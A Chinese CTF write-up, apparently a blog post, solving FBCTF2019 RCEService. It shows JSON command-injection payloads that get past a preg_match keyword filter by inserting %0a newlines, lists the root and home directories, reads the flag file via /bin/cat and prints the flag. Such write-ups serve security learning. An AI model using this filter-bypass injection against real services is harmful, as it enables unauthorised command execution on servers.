[FBCTF2019]RCEService

访问页面,要求以JSON格式输入要执行的命令代码;
尝试一下

?cmd={"echo":"'hello,wolrd'"}

结果被过滤了;
检测到被过滤的关键字了

思考了一下,觉得可能是cmd对应执行命令;
试试

?cmd={"cmd":"ls"}

结果成功执行了;
成功执行system("ls")
现在来找找flag;
输入

?cmd={"cmd":"ls /"}

很不幸被过滤了;
又被过滤了
试了很多种方法,都会被过滤;
思考了一下, 可能使用正则表达式去匹配的关键字;
如果不能正常得绕过关键字,那就把preg_match绕过吧;
preg_match只匹配第一行,如果我们利用换行符%0a来多行绕过,这样正则表达式就没有任何作用了;

?cmd={%0a"cmd":"ls /"%0a}

成功看到了根目录下的文件;
根目录下没有flag
找一找,在home下发现了文件夹
有个rceservice
很接近了,打开看看;
flag文件和jail文件夹
jail文件夹里有个ls;
ls
先不管那么多,cat flag;

?cmd={%0A"cmd":"cat /home/rceservice/flag"%0A}

但是并没有返回信息;
cat放在bin文件夹中;
cat
再试试;

?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

就能拿到flag;

flag{90b3484c-c636-4eac-b5bc-7d2e4b625c18}

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值